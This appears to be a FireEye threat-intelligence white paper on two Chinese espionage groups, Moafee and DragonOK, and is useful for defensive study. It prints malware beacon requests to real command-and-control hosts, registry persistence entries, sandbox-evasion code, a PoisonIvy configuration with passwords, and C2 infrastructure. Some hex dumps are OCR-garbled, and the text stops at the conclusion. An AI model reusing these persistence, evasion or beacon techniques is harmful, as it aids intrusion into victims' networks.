WHITE PAPER



# OPERATION QUANTUM ENTANGLEMENT

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# SECURITY REIMAGINED

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In the realm of quantum mechanics, entanglement is a peculiar phenomenon in which a **pair of particles takes on the properties of each other, regardless of the distance between them**. Albert Einstein best described this intertwining phenomenon as "**spooky action at a distance**"<sup>1</sup>. This behavior is analogous to the observed correlation between the two geographically separated attack groups detailed in this paper.

We have uncovered two distinct attack campaigns originating from different geographic regions in China using similar tools, techniques and procedures (TTPs). In both campaigns, each attack group employed multiple overlapping TTPs to infiltrate their targets, including similar custom built backdoors and remote administration tools (RATs) such as CT/NewCT, Mongall and Nflog (and publicly available RATs such as **PoisonIvy**) to maintain access to victim networks. We also observed the use of another custom backdoor called Sysget/HelloBridge by one of the attack groups, which we believe is possibly shared between the campaigns as well. Both groups were also used a well-known proxy tool named HTRAN, which is an abbreviation for "HUC Packet Transmit Tool"<sup>2</sup>. This tool proxies connections through intermediate hops and aids the attackers in disguising their true geographical location when interacting with the victim networks. We also observed both attack groups using similar techniques to evade detection by security

products. In sum, we believe that these groups are from two distinct regions in China and possibly (1) are collaborating, (2) received the same training, (3) have a common toolkit supply chain, or some combination of these three.

The relationship between the two attack groups may be direct or indirect, but based on our current visibility, they seem to have two distinct missions, with each one targeting different industries. We were able to ascertain the geographical locations of the two attack groups by analyzing their "HTRAN" infrastructure over a period of time. We believe a separate third group may also be employing these tools, but we do not have sufficient insight in to this additional group at this time.

The attack group "Moafee" (named after their command and control infrastructure) appears to operate out of the Guangdong province in China and is known to target the governments and military organizations of countries with national interests in the South China Sea. The seas in this region have multiple claims of sovereignty and hold high significance, as it is the second busiest sea-lane in the world<sup>3</sup> and are known to be rich in resources such as rare earth metals<sup>4</sup>, crude oil, and natural gas<sup>5</sup>. We have also observed the Moafee group target organizations within the US defense industrial base.



<sup>&</sup>lt;sup>1</sup> http://www.technologyreview.com/view/427174/einsteins-spooky-action-at-a-distance-paradox-

<sup>&</sup>lt;sup>2</sup> http://www.secureworks.com/cyber-threat-intelligence/threats/htran/

<sup>&</sup>lt;sup>3</sup> http://en.wikipedia.org/wiki/South\_China\_Sea#Resources

<sup>&</sup>lt;sup>4</sup> http://www.ifri.org/downloads/ifricanonopedseamanecs.pdf

<sup>&</sup>lt;sup>5</sup> http://www.eia.gov/countries/regions-topics.cfm?fips=scs

The attack group "DragonOK" (named after an event name in one of their payload executables <sup>6</sup>) appears to operate out of the Jiangsu province in China, and is known to target high-tech and manufacturing companies in Japan and Taiwan. The propensity to target these industries possibly demonstrates an interest in gaining economic competitive advantage in the region through the acquisition of trade secrets.

# Attack Methodology:

#### Attack vector:

The primary observed attack vector used by both groups is spear-phishing emails. The themes--or topics—used in the emails from the DragonOK group were well crafted and highly tailored to the target audience. We also found this attack group

using the appropriate language for each of their targets in the phishing emails – such as Japanese and traditional Chinese (mainly used in Taiwan). The attachments in the email were typically an executable file embedded in a ZIP archive or password-protected Microsoft Office documents. One such email, shown in Figure 2 and used by the DragonOK group was written in traditional Chinese, and targeted a Taiwanese technology firm

#### **Decoy Behavior**

We observed both attack groups employ decoy documents in order to help deceive potential victims. The decoy documents are presented to the victim while the malware runs in the background. One such Japanese-language decoy documents used by the "DragonOK" group is



<sup>6</sup> http://www.fireeye.com/blog/technical/malware-research/2013/02/hackers-targeting-taiwanese-technology-firm.html



shown below. It appears to be a resume of someone from Kyoto University in Japan who was involved in English language studies.

#### **Evasion Techniques:**

Both attack groups employ numerous, yet common techniques in an attempt to evade detection by various sandbox environments, antivirus (AV) software, and gateway firewalls. We observed environment-based evasion, the use of large file sizes, and password-protected documents – each of which are described in the sections below.

#### **CPU Core Check**

The first-stage payload for RATs called "CT/ NewCT" used by both the Moafee and DragonOK attack groups employs an evasive "CPU core check" technique. The payload attempts to detect the number of processor

#### Figure 2:

Email containing "888888" password in body with passwordprotected document attached

# 寄件人: 日期: 2012年11月29日 0:56:17 [GMT-08:00] 收件人: 標題: 明年起退休金免稅基準提高

# 各位勞工:

- 因應物價上漲, 財政部27日公告102年度計算退職所得定額免稅之金額如下: 一、一次領取退職所得者, 其所得額之計算方式如下:
- (一)一次領取總額在175,000元乘以退職服務年資之金額以下者,所得額為0。
- (二)超過175,000元乘以退職服務年資之金額,未達351,000元乘以退職服務 年資之金額部分,以其半數為所得額。
- (三)超過351,000元乘以退職服務年資之金額部分、全數為所得額。

二、分期領取退職所得者,以全年領取總額,減除758,000元後之餘額為所得額。 財政部進一步說明,上述102年度綜合所得稅退職所得定額免稅金額之調整, 係依所得稅法規定之機制調整,納稅義務人於103年辦理102年度綜合所得稅結算 申報時可適用。修正前後對照表詳附表開啟密碼:888888)。

> 行政院勞工委員會 聯絡電話:23228122

cores in the running environment, by calling the "GetSystemInfo" API, which returns a structure with system data, including number of cores. If only one core is detected, it quits as seen in Figure 5. This probably is an attempt to detect virtualized environments such as sandboxes, as well as other analysis environments used by reverse engineers, which often tend to be configured with a single core.

We also observed a similar evasion technique within the "Sysget/HelloBridge" payload

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# Figure 3: Example de

document presented to the victim during a DragonOK phishing attack



employed by the DragonOK group. It invokes a similar call to "GetSystemInfo" to determine the number of active CPU cores, and the code quits if the system is configured with only one core.

#### **Password Protected Documents:**

The "DragonOK" group in particular is known to use password-protected documents delivered as attachments in emails, with the password listed in the contents of the email. This method probably is used to evade detection by AV software, gateway firewalls and malware sandboxes. One such example using the password "888888" is shown in Figure 2 and Figure 6, and has been observed by FireEye<sup>7</sup> before. Another similar sample was referenced by the "contagio" blog<sup>8</sup> and used the password "8861".

Figure 5: Evasion based on CPU core detection

88481886	8D4424 1C	LEA EAX, DWORD PTR [ESP+1C]	
0040100A .	53	PUSH EBX	
0840109B	55	PUSH EBP	
0040100C .	56	PUSH ESI	
0840100D .	57	PUSH EDI	
0840100E .	50	PUSH EAX	pSystemInfo
0040100F	FF15 8488488	CALL DWORD PTR [<&KERNEL32.GetSystemInf	LGetSystemInfo
00401015 .	8B2D 0080400	MOU EBP, DWORD PTR [<&KERNEL32.ExitProce	kerne132.ExitProcess
0840101B .	837024 40 01	CMP DWORD PTR [ESP+40],1	
08401020	75 04	JHZ SHORT eee.00401026	and the second sec
00401022 .	6A 88	PUSH 0	ExitCode = 0
08401024 .	FFD5	CALL EBP	LExitProcess

<sup>7</sup> http://www.fireeye.com/blog/technical/malware-research/2013/02/hackers-targeting-taiwanese-technology-firm.html

<sup>8</sup> http://contagiodump.blogspot.com/2012/08/cve-2012-0158-generated-8861-password.html



### Large files:

In older phishing emails that link to the tools used by DragonOK and Moafee, we observed an implant over 10 megabytes in size. It was padded with unnecessary null bytes in the overlay section of the file, in order to increase the file size as shown in Figure 7. This probably was done to evade detection, as many hostbased and network-based AV engines do not have the ability to scan large files.



Figure 7:

Large null padded overlay section

6E00h:	b0	00	00	00	00	00	00	00	00	00	00	00	00	.00	00	00	
6E10h:	00	00	00	00	00	00	00	00	08	00	00	00	00	00	00	00	************
6E20h:	00	00	00	00	00	00	00	00	00	00	00	00	00	00	00	00	
6E30h:	00	00	00	00	60	00	00	00	00	00	00	00	00	00	00	00	
6E40h:	00	00	00	00	00	00	00	00	00	00	00	00	00	00	00	00	
6E50h:	00	00	00	00	60	00	00	00	00	00	60	00	00	00	00	00	
6E60h:	00	00	00	00	00	00	00	00	00	00	00	00	00	00	00	00	**************
6E70h:	00	00	00	00	00	00	00	00	00	00	00	00	00	00	00	00	
6E80h:	00	00	00	00	60	00	00	00	00	00	60	00	00	00	00	00	
6E90h:	00	00	00	00	00	80	00	88	00	00	00	00	00	88	00	00	

Value Start Size Color Name BYTE Overlay (10457600) 9F9200h 6E00th Fg Bg: 6E00h 1h BYTE Overlay[0] 0 Fg: Bg: BYTE Overlay[1] 0 6E01h 1h Fg: Bg: BYTE Overlay[2] 0 6E02h th Fg: Bg: BYTE Overlay[3] 0 6E03h 1h Fg: Bg: BYTE Overlay[4] 0 6E04h 1h Fg: Bg: BYTE Overlay[5] 0 6E05h 1h Fg: Bg: BYTE Overlay[6] 0 6E06h 1h Fg: Bg: BYTE Overlay[7] 6E07h 0 1h Fg: Bg: BYTE Overlay[8] 0 6E06h 1h Fg: Bg: BYTE Overlay[9] 0 6E09h 1h Fg: Bg: 0 BYTE Overlay[10] 6E0Ah 1h Fg: Bg:

# Backdoor and RAT Tools:

# **CT/NewCT**

# **Dropper:**

This is a first stage payload that drops and runs the NewCT implant. The first stage payload (example: 46e55cdf507ef10b11d74dad6af8b94e) attempts to detect the number of CPU cores in the running environment by calling GetSystemInfo as described in the previous section. If the CPU core check detects more than one core, it implants the NewCT2 RAT in %temp%\MSSoap.DLL (some variants will use BurnDCSrv.DLL and IntelAMTPP.DLL) and executes the written file. The actual implant is packaged in the resource section of the dropper with a fake bitmap (BMP) header, as shown in Figure 8.

#### SMP 00000240 42 4D 50 00 03 00 00 00 04 00 00 00 FF FF 00 00 00000250 in @g 141 Figure 8: 00000260 ...... (6) 20103 DLL implant 00000270 ...... 🔅 🧰 Menu 00000280 embedded in a 🔄 Dialog 00000290 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 1s program canno 69 resource section with 🙀 🧿 String Table 000002340 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 🔅 🦲 Accelerators a fake BMP header 00000230 65 6F 64 65 2E 0D 05 0A 24 00 00 00 00 00 00 00 mode. \*\*\* f \*\*\*\*\*\*\* 🖌 🧰 Icon Oroup ·P· 111411141114 000002200 19 50 27 86 5D 31 49 E5 5D 31 49 E5 5D 31 49 E5 H 🔛 loon B5 2E 42 E5 5E 31 49 E5 5D 31 49 E5 54 31 49 E5 µ.84-114]1147114 000000210 26 2D 45 E5 5C 31 49 E5 DE 2D 47 E5 5F 31 49 E5 0000002200 6-Eå\11å>-Gå 11å 00000270 32 2E 43 E5 59 31 49 E5 32 2E 4D E5 5F 31 49 E5 2.CAV11A2.MA\_11A 00000300 OF 2E 5A E5 58 31 49 E5 50 31 48 E5 09 31 49 E5 2. 28X1181 1H4+118 \*\*B&V11&0.H&\114 68 17 42 E5 56 31 49 E5 A2 11 40 E5 5C 31 49 E5 00000310 Rich] 114 ..... 52 69 63 68 50 31 49 E5 00 00 00 00 00 00 00 00 00000320 00000330 ...... 0000C340 50 45 00 00 4C 01 04 00 CA 50 52 51 00 00 00 00 PE++L+++E1 RQ++++ 0000C350 00 00 00 00 E0 00 0E 21 0B 01 06 00 00 4A 00 00 00 68 00 00 00 00 00 58 55 00 00 00 10 00 00 · 3 · · · · · · 20 · · · · · · 00000360

The implant also creates a registry entry file called named "Windows.reg" and imports it the contents of this file into the registry, using the command: "regedit.exe /s Windows.reg". These registry entries ensure startup persistence. The contents of "Windows.reg" is populated based on the Operating System (OS) which is determined by a call to the GetVersionEx API.

If "dwBuildNumber" is equal to 2 (VER\_ PLATFORM\_WIN32\_NT) and "dwMajorVersion" is less than 6 (prior to Windows Vista) it adds following entry for persistence:

[HKEY\_CLASSES\_ROOT\CLSID\{fbeb8a05beee-4442-804e-409d6c4515e9}\ InProcServer32] @="%Temp%\MSSoap.DLL"

Otherwise it creates a copy of itself to %Temp%\ WmiPrvSer.exe and creates the following entry for persistence:

HKCU \Software\Microsoft\Windows\
CurrentVersion\Run\"dllhost" =
%Temp%\WmiPrvSer.exe

contents of this file into the registry, using the command: "regedit.exe /s Windows BOOL WINAPI GetVersionEx( \_\_Inout\_\_ LPOSVERSIONINFO

DLL implant embedded in resource section with a fake BMP header

Figure 9:

\_Inout\_ LPOSVERSIONINFO lpVersionInfo );

typedef struct \_OSVERSIONINFO {
 DWORD dwOSVersionInfoSize;
 DWORD dwMajorVersion;
 DWORD dwMinorVersion;
 DWORD dwBuildNumber;
 DWORD dwPlatformId;
 TCHAR szCSDVersion[128];
} OSVERSIONINFO;



We also found some clues in the binary that indicate that the tool was authored and built by someone using Chinese fonts on their computer. It contains resource strings in English but the language is set to Chinese as shown below.

#### Figure 10:

Embedded string table in resource section with language set to Chinese

STRINGTA	BLE	
LANGUAGE	LANG_CHINESE,	0x2
{		
103, `	"NewCT2"	
106, `	"Hello World!"	
109, `	"NEWCT2"	
}		

#### Implant

The implant (example:

ccff6e0a6f5e7715bdaf62adf0cbed4f) is called "NewCT/CT" RAT. The particular version we analyzed was NewCT version 2. The implant has persistence mechanisms and contains functionality to perform command and control communication. This backdoor also has functionality to load additional plugins from the command and control server. It exports the following two functions:

SendData CreateInstance

It creates a mutex "HFRM\_" to ensure there is only one running copy of the backdoor. It ensures this by checking if the return value from CreateMutexA is 183 (\xB7), which corresponds to "ERROR ALREADY EXISTS"<sup>9</sup>.

The payload emits the "POST" network beacon shown below along with stub data. The header values are hardcoded in the payload, specifically the values for "User-Agent", "Cache-Control" and the bytes at offset 0 of the stub (\xcf\xcf) may be of interest to network defenders.

Figure 11: Mutex usage and checks to ensure one running copy	push xor push call call cnp	offset Name ebx, ebx ebx ds:CreateMutexA ds:GetLastError eax, OB7h	;	"HFRM_" bInitialOwner lpMutexAttributes
	inz	short loc 100041	1 80	

<sup>9</sup> http://msdn.microsoft.com/en-us/library/windows/desktop/ms681382%28v=vs.85%29.aspx

```
POST / HTTP/1.1
Accept-Language: en-en
Content-Type: application/octet-
stream
Pragma: no-cache
Cache-Control: max-age=259200
Connection: Close
Content-Length: 1594
User-Agent: Mozilla/4.0
(compatible; MSIE 6.0;Windows NT
5.1)
Host: http.jpaols[.]com\x0d\x0a\
x0d\x0a\xcf\xcf...
```

The POST stub contains encrypted data. The encrypted data has two layers of abstraction. It is subjected to a bitwise NOT operation followed by encryption using a randomly generated 4-byte XOR key. The data within the POST stub is constructed in a buffer with a header at offset 0 (\ x30\x30) followed by the remote sever, remote port, XOR encrypted data and function call location. The function call location is represented by the textual values shown in the table below and is selected using a switch case statement as shown in Figure 12. It is used by the attacker to track the call path that resulted in the network beacon. The XOR encrypted data contains the MAC Address, hostname and campaign code.

Numeric Representation	Textual Representation
0	index.asp
1	index.php
2	index.jsp
3	index.css
4	home.asp



	below shows data before and after a bitwise non operation.
Figure 13: Encrypted POST stub	1 00000000: CF CF CE C7.97 8B 8B 8F.D1 95 8F 9E.90 93 8C D1 2 00000010: 9C 90 92 C5.C7 CF 90 FF.FF FF D0 CF.CF CB CE D0 3 00000020: CD CD D0 DA.CF CF DA CF.CF DA CF C9.DA CF CE DA 4 00000030: 5 00000040: 6 00000050: 7 00000060: CB CC D0 DA.C9 99 D0 DA.CA C7 DA CA.CC DA C9 9D 8 00000070: DA C8 99 DA.CA CA DA CB.C8 DA C8 C8.DA C9 CA D0 9 00000880: 96 91 9B 9A.87 D1 9E 8C.8F 00 00 00.00 06 00 00 9 00000880: 96 91 9B 9A.87 D1 9E 8C.8F 00 00 00.00 06 00 00 9 00000880: 96 91 9B 9A.87 D1 9E 8C.8F 00 00 00.00 06 00 00 0 00000880: 96 91 9B 9A.87 D1 9E 8C.8F 00 00 00.00 06 00 00 0 00000880: 96 91 9B 9A.87 D1 9E 8C.8F 00 00 00.00 06 00 00 0 00000800: 00 00 00 00 00 00 00 00 00 00 00 00
<b>Figure 14:</b> POST stub after bitwise NOT operation	1 00000000: 30 30 31 38.68 74 74 70.2E 6A 70 61.6F 6C 73 2E 0018http.jpaols. 2 0000010: 63 6F 6D 3A.38 30 6F 00.00 00 2F 30.30 34 31 2F com:800 /0041/ 3 0000020: 32 32 2F 25.30 30 25 30.30 25 30 36.25 30 31 25 22/%00%00%06%01% 4 0000030: 0 0000040: 0 0000050: 7 0000060: 34 33 2F 25.36 66 2F 25.35 38 25 35.33 25 36 62 43/%6f/%58%53%6b 0 0000070: 25 37 66 25.35 35 25 34.37 25 37 37.25 36 35 2F %7f%55%47%77%65/ 9 0000080: 69 6E 64 65.78 2E 61 73.70 FF FF FF.FF F9 FF FF index.asp ·
	In the resulting data after NOT operation, the XOR key is \x30\x30\x34\x31. When applied to the hex data following it, we get the decrypted data below, which contains the MAC Address, hostname, and campaign code. The Python routine to perform this decryption is included in Appendix A
<b>Figure 15:</b> Embedded XOR encrypted data in POST stub	1 00000000: 30 30 2 00000010: .68 63 5F 4E.65 77 43 54 [▲hc_NewCT 3 00000020:
	We observed plugin functionality in the implant. It has the ability to load a DLL downloaded from the remote server, and calls the following export functions in the DLL: Plugin_GetID Plugin_Init Plugins_Start

To elucidate the encryption scheme, let us go over a sample decryption process. The Figures 13 and 14 below shows data before and after a bitwise NOT operation.

Plugin\_End



Figure 16: DLL Plugin functionality

allowing additional payloads to be loaded from the server



The call graph for this functionality is shown in Figure 16.

NewCT RAT evolved from older versions called "CT", which has been observed being used in association with the "Nflog" Backdoor. The following password-protected document (46ac122183c32858581e95ef40bd31b3) creates a DLL implant called IntelAMTPP.dll (ebd1f5e471774bb283de44e121efa3e5), which is the "CT" RAT. In this case, the "CT" implant is 10 MB in size, as it has padded null bytes at the end of the file to increase file size in a possible attempt to evade AV engines as described in the previous section on evasion techniques. The "CT" implant has identical functionality to "NewCT", as observed from the embedded strings.

```
00005A58 Connection:close

00005A6C Cache-Control: max-

age=259200

00005A8C Pragma: no-cache

00005AA0 Mozilla/4.0 (compatible;

MSIE 6.0;Windows NT 5.1)

00005AD4 Content-Type: application/

octet-stream

00005AFC image/gif,

image/x-xbitmap, image/jpeg, image/

pjpeg, /

00005B38 Accept-Language: en-en
```

```
00005B50 %s%02x

00005B5C home.asp

00005B68 index.css

00005B74 index.jsp

00005B80 index.php

00005B8C index.asp

00005F3C ct.datangcun.com

00005F3C ct.datangcun.com

00005F7C 20120509

00005F8C CT V2.1

00006374 Plugin_End

00006380 Plugin_Start

00006390 Plugin_Init

0000639C Plugin_GetID
```

This version was called "CT V2.1" by the author, which may indicate that there were other earlier versions of this RAT and that it was improved upon incrementally. One of the command and control servers used by a variant of this implant is aptly named "ct.datangcun[.]com". We do not believe either Moafee or DragonOK have controlled the domain "ct.datangcun[.] com", but it was probably controlled by a third group which also used the implant in a separate campaign. The network beacon for version 2.1 is shown below; it uses the same encryption scheme as "NewCT": POST / HTTP/1.1 Accept-Language: en-en Content-Type: application/octet-stream Pragma: no-cache Cache-Control: max-age=259200 Content-Length: 1572 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1) Host: ct.datangcun[.]com:1353\x0d\ x0a\x0d\x0a\xcf\xcf

We also observed both attack groups using campaign codes within this implant and which are listed in Appendix B. The campaign codes referred to victim countries, attack dates, command and control infrastructure, and other operational codes – which remain undeciphered.

#### Nflog

We have observed DragonOK and Moafee use the Nflog implant in addition to an earlier version of the NewCT2 implant. The password-protected XLS document (46ac-122183c32858581e95ef40bd31b3) referenced earlier also drops an "Nflog" implant (a3d3b0686e7bd13293ad0e63ebec67af) in addition to ..... The "Nflog" implant emits the following network beacon format:

POST /NfLog/Nfile.asp HTTP/1.1 Accept: \*/\* User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1) Host: Content-Length: 0 Cache-Control: no-cache

POST /NfLog/NfStart.asp?ClientId={LocalIP}%20<49d0>%20{ExternalIP}&Nick={Identifier}&dtime=T:8-6-0-53 HTTP/1.1 Accept: \*/\* Use-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: Content-Length: 36 Cache-Control: no-cache Cookie: ASPSESSIONIDACCARCDD=OKNPG-CKDLEKEHBOHIHLCOMHD

We have observed the use of a newer variant of Nflog (example: 3eab5e12f99b47e822721e-93639ba1d1) being employed in attacks, which has the beacon format shown below:

POST /windowsxp/SNews.asp?HostID={-MAC Address} HTTP/1.1 Accept: / Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: Content-Length: 126 Connection: Close Cookie: ASPSESSIONIDAARSSTTB=ECD-DKIAAOHGODEKKFGOKNJCD

Other URI formats it uses are as follows: /windowsxp/SSports.asp?HostID= /windowsxp/SWeather.asp?HostID= /windowsxp/SJobs.asp?HostID= /windowsxp/STravel.asp?HostID= /windowsxp/NfHostInfo.asp?NickId= /windowsxp/SGames.asp?HostID=

Note the same User-Agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" is used by both the older and newer version of "Nflog" samples. We also found code-level similarities in the network communication function code, as well as the data collection function code shown in Figure 17. This strongly suggests that it is an updated version of the "Nflog" backdoor.

#### Figure 17:

Identical data collection function seen in both older and newer Nflog variants

.text:100038F0	push	ebo
text-188829E1	DOU	aba aca
. CEXC. 10003071	100	eop, esp
.text:100038F3	nov	eax, [ebp+1pF11eName]
.text:100038F6	push	Ø ; hTemplateFile
.text:100038F8	nush	80b duFlansAndAttributes
tout = 100000000	puch	a dufugationDispecition
.Cext:100038FD	pusn	2 , uncreacionnisposicion
.text:100038FF	push	0 ; 1pSecurityAttributes
.text:10003901	push	8 ; dvShareNode
text:18883983	nuch	000000000 dubecired0ccess
heut - 40000000	push	and a lafilalland
.Cext:10003908	pusn	eax ; iprilenane
.text:10003909	call	ds:CreateFileA
.text:1000390F	ROV	hObject, eax
text-18883914	CBD	eav BEEFEFEEh
toxt - 18889047	4.7	100 1888900E
.CEAC. 10003917	J2 .	100_10003907
.text:10003910	pusn	eax ; nFile
.text:1000391E	push	offset alpconfigAll ; "ipconfig /all"
.text:10003923	call	sub 10003660
text-18883928	test	03Y 03Y
.cexc.10000720	de se	100,000
.Cext:1000392H	JZ	100_10003962
.text:10003930	nov	ecx, hObject
.text:10003936	push	ecx ; hFile
text:18883937	nush	offset aNetStart : "net start"
toxt-18882020	0.11	cub 18882668
.Cext. 10003736	Call	200_10003000
.text:10003941	test	eax, eax
.text:10003943	jz	short loc_100039C2
.text:10003945	ROV	edx, hObject
text:18883948	nush	edy : bFile
toxt-18882060	nuch	offect sTacklict - "tacklict"
.Cext.10003746	pusn	UTTSEL BIBSKIISC ; CASKIISC
.text:10003951	call	sub_10003660
.text:10003956	test	eax, eax
.text:10003958	iz	short loc 10003902
text-18883956	BOU	eav bObject
tout 10000756	nuch	
.Cext:1000395F	pusn	eax ; nrite
.text:10003960	push	offset aSysteminfo ; "systeminfo"
.text:10003965	call	sub_10003660
.text:1000396A	test	eax, eax
text:1888396C	iz	short loc 18883962
text-18882045		ees b0bject
	nuv	eex, nouject
.text:10003974	pusn	ecx ; nFile
.text:10003975	push	offset aNetstatAn ; "netstat -an"
.text:1000397A	call	sub 10003660
.text:1888397F	test	eax, eax
text-18882091	4	chart loc 18882002
heut - 10000701	14	adu büblaat
.cexc:10003983	HOU	eax, nubject
.text:10003989	push	edx ; hFile
.text:1000398A	push	offset aNetView ; "net view"
.text:1000398F	call	sub 18883668
text-18883994	test	eav. eav
text : 18882004	4.2	chart loc 18882002
. Lext. 10003990	12	SHOP C 10C_10003962
.text:10003998	nov	eax, hubject
.text:1000399D	push	eax ; hFile
.text:1808399E	push	offset aDirProgramfile : "dir \"%ProgramFiles%\""
text:18883983	call	sub 18883668
text = 18883049	tect	A34 A34
. LEAC: 10003980	cest	can, can
.text:100039AA	JZ	short 10c_100039C2
.text:100039AC	nov	ecx, hObject
.text:18083982	push	ecx : h0bject
text:18883983	call	ds:CloseHandle
text = 18882000	DOW	any 4
. Lext. 10003989	100	eax, i
.CexC:1000398E	pop	eop
.text:1000398F	retn	4

#### Sysget/HelloBridge

This tool has recently been analyzed by Secureworks <sup>10</sup>. We observed the DragonOK attacker employ this tool against targets in Japan and Taiwan (e.g. 57e3d002542e07f2eb09fd2b1b0eeab2), as also noted by Secureworks. We have not yet seen the Moafee group use this tool. This implant has the following beacon format:

GET /el/sregister.php?name=[REDACTED] HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Host: 122.10.62.137 Connection: Keep-Alive Other URI formats include:

/el/slogin.php?uid= /el/suploadfile.php?item= /el/suploadfile.php

#### Mongall

FireEye has previously analyzed this backdoor<sup>11</sup>, which is used by multiple other groups in addition to DragonOK and Moafee. DragonOK in particular is known to frequently use this implant (e.g. e8d77d19e1c6f462f4a5bf6fbe673a3c), which has the following network beacon format:

#### Poisonlvy

This is a publicly available RAT used by multiple threat actors, which has been extensively analyzed in a previous FireEye white paper<sup>12</sup>. The extracted configuration blocks from a "DragonOK" PoisonIvy variant (65fcc9b9ff608801edc-697552438cfee), is shown below:

#### ID: ftp

Domains: ftp.skydnastwm.com:15836| Password: Ecp982\*@Me2 Mutex: fftp

In contrast, here is an extracted PoisonIvy configuration block from a "Moafee" instance (9ebe86a648b1f19836251f946a160b16), as shown below:

#### ID:

Domains: afp.mozjlla.com| Password: 741526 Mutex: )!afpA.I4

# **Threat Actor Attribution**

#### Campaign #1: Moafee

We have observed the Moafee group target the governments and militaries of countries with national interests in the South China Sea. We have also observed this group target companies within the US defense industrial base.

As discussed, we have observed the Moafee group use a number of different tools including Poison Ivy, Nflog, Mongall, and NewCT2.

We found this group running HTRAN on one of their front-end command and control servers. The command and control server in question was



<sup>&</sup>lt;sup>10</sup> http://www.secureworks.com/resources/blog/research/hellobridge-trojan-uses-heartbleed-news-to-lure-victims/

<sup>&</sup>lt;sup>11</sup> http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-ofmalaysian-flight-mh-370.html

<sup>&</sup>lt;sup>12</sup> http://www.fireeye.com/resources/pdfs/fireeye-poison-ivy-report.pdf

<sup>&</sup>lt;sup>13</sup> http://en.wikipedia.org/wiki/South\_China\_Sea#Resources

<sup>14</sup> http://www.ifri.org/downloads/ifricanonopedseamanecs.pdf

<sup>&</sup>lt;sup>15</sup> http://www.eia.gov/countries/regions-topics.cfm?fips=scs

located at 58.64.201.229. We monitored this server for two months, from January to March this year. During this time period, we observed the following domains resolving to 58.64.201.229:

ph.moafee[.]com afp.mozjlla[.]com mofa.mozjlla[.]com acer.moafee[.]com del.moafee[.]com jnt.moafee[.]com pcg.moafee[.]com sslc.moafee[.]com lw.moafee[.]com ks.moafee[.]com oa.moafee[.]com xxpp.moafee[.]com hp.moafee[.]com gumm.mozjlla[.]com msn.moafee[.]com

During this same time frame, the HTRAN client at 58.64.201.229 was observed attempting to connect to a number of different backend HTRAN servers. All of these HTRAN servers were located in the Guangdong Province and operated by CHINANET.

Additionally, the Moafee group also hosted a Poisonlyy command and control server at phi. crabdance[.] com. Between April 30, 2012

DATE	CNC	HTRAN Backend	HTRAN Backend Geolocation
2014-03-15	58.64.201.229	169.254.163.19	LINK LOCAL
2014-03-02	58.64.201.229	113.65.22.148	CHINANET GUANGDONG PROVINCE NETWORK
2014-02-22	58.64.201.229	169.254.61.191	LINK LOCAL
2014-02-18	58.64.201.229	113.68.111.111	CHINANET GUANGDONG PROVINCE NETWORK
2014-02-15	58.64.201.229	113.68.108.62	CHINANET GUANGDONG PROVINCE NETWORK
2014-02-12	58.64.201.229	113.68.168.73	CHINANET GUANGDONG PROVINCE NETWORK
2014-02-02	58.64.201.229	169.254.92.25	LINK LOCAL
2014-01-30	58.64.201.229	113.65.43.42	CHINANET GUANGDONG PROVINCE NETWORK
2014-01-27	58.64.201.229	113.66.12.112	CHINANET GUANGDONG PROVINCE NETWORK
2014-01-25	58.64.201.229	113.65.41.28	CHINANET GUANGDONG PROVINCE NETWORK
2014-01-20	58.64.201.229	113.68.171.67	CHINANET GUANGDONG PROVINCE NETWORK
2014-01-15	58.64.201.229	113.68.110.239	CHINANET GUANGDONG PROVINCE NETWORK

<sup>13</sup> http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-ofmalaysian-flight-mh-370.html

12 http://www.fireeye.com/resources/pdfs/fireeye-poison-ivy-report.pdf



and July 1, 2012, the phi.crabance[.]com domain resolved to 98.126.91.66. This IP was observed hosting a HTRAN proxy client, which was seen connecting to a backend HTRAN server hosted at 113.66.248.60. This server was also located in the Guangdong Province and operated by CHINANET.

In short, the Moafee group was observed consistently hosting their backend HTRAN servers in Guangdong. This observation may reveal that the Moafee group is physically located in this province.

#### Campaign #2: DragonOK

We have observed the DragonOK group target high-technology and manufacturing companies in both Japan and Taiwan. This group has used similar malware to the Moafee group described above. Specifically, we observed DragonOK employing PoisonIvy, Nflog, Mongall, CT, and NewCT.

Like the Moafee group, we observed the DragonOK group running an HTRAN proxy client on one of their front-end command and control servers. For approximately one week, between July 31, 2013 and August 8, 2013, the domain www.ndbssh[.]com served as a command and control server for Mongall payloads distributed by the DragonOK group. During this time, DragonOK also ran an HTRAN proxy client on www.ndbssh[.]com.

This HTRAN client was seen attempting to connect to three different HTRAN servers located in the Jiangsu province and operated by CHINANET.

The domain www.ndbssh[.] com resolved to 206.161.216.219 between 2013-09-28 and

DATE	CNC	HTRAN Backend	HTRAN Backend Geolocation
2013-08-05	www.ndbssh.com	58.217.168.205	CHINANET JIANGSU PROVINCE NETWORK
2013-08-04	www.ndbssh.com	222.95.171.178	CHINANET JIANGSU PROVINCE NETWORK
2013-07-31	www.ndbssh.com	58.217.169.95	CHINANET JIANGSU PROVINCE NETWORK

2013-10-04. The following other domains were seen resolving to this same IP:

DATE	CNC Domain
2013-08-20	www.ghostale[.]com
2013-09-06	www.ycbackap[.]com
2013-12-20	asp.skyppee[.]com
2013-12-20	<pre>facebook.skyppee[.]com</pre>
2013-12-20	pop.skyppee[.]com
2013-12-20	<pre>mail.skyppee[.]com</pre>
2013-12-20	<pre>mil.skyppee[.]com</pre>
2013-12-20	web.pktmedia[.]com
2013-12-20	bbs.pktmedia[.]com

The DragonOK group was observed hosting their backend HTRAN servers in Jiangsu. This observation may reveal that the DragonOK group is physically located in the Jiangsu province.



# Conclusion

Based on the geolocation evidence provided in this paper, it appears that different operators executed the Moafee and DragonOK campaigns. This conclusion is supported by the following assessments:

